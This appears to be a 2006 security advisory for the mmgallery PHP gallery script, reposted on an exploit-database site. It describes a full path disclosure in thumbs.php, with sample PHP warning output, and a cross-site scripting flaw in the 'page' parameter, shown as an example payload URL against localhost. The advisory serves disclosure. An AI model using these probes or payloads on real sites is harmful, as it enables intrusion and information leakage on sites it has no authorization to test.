mmgallery Multiple vulnerabilities

2006.11.27

Credit: Al7ejaz HackerZ

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-6119 | CVE-2006-6118

CWE: N/A

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++
+ ;;ii,,:: +
+ :::: :: ;;tt;;:: +
+ ;;:: ..,,:: ;;ii,,:: +
+ ,,,, ii;;,, ii;;:: ;;ii,,:: +
+ ii:: tt;;,, ..tt;;,,.. ;;ii;;:: +
+ ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: +
+ tt;;::..,, tt;;,, ff;;;;ii ;;ii,,:: +
+ tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,:: +
+ tt;;;;,, tt;;,,.. tt;;;; ;;ii;;:: +
+ ..::,,;;,, tt;;,,.. tt;;,, ;;ii,,:: +
+ ..::,,ii;;;;.. tt;;,,.. iiii,,:: ;;ii,,:: +
+ ::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,:: +
+ ,,;;ii tt;;,, ii;;,,.. ..jj;;:: ;;ii;;:: +
+ ;;;;:: tt;;:: tt;;;;.. ff;;:: ;;tt,,.. +
+ ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,.. +
+ ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;.. +
+ tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,.. +
+ jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,.. +
+ ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;.. +
+ ..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,.. +
+ iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;; +
+ ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;:: ;;ii,, +
+ jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,, +
+ jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii:: +
+ iijjjjjjtt;; ;;ffffjjjjtt:: ;;ii +
+ ;;.. ii;; +
+ .. +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++
+ +
Credit by : Al7ejaz HackerZ
mmgallery Multiple vulnerabilities
Script : mmgallery
Website: mmgallery.net
Impact : FullPath disclosure and Cross site Scripting
FullPath disclosure in thumbs.php
*********************************
when thumbs.php file is called directelly withowth argument this cause fullpath disclosure
http://localhost/thumbs.php
Result
------------------------------------------------------------------------
Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/photos/functions.inc on line 46
Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 58
Galery :: Title ::
Warning: opendir(.//thumbs) [function.opendir]: failed to open dir: No such file or directory in /var/www/user/functions.inc on line 99
Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 101
Warning: sort() expects parameter 1 to be array, null given in /var/www/user/functions.inc on line 112
Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/user/functions.inc on line 113
--------------------------------------------
Cross Site Scripting
************************
page varibale is not proprely verified and can be used to execute arbitary htmlcode
http://localhost/thumbs.php?page='>
Al7ejaz HackerZ ;)
/Milw0rm

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

mmgallery Multiple vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.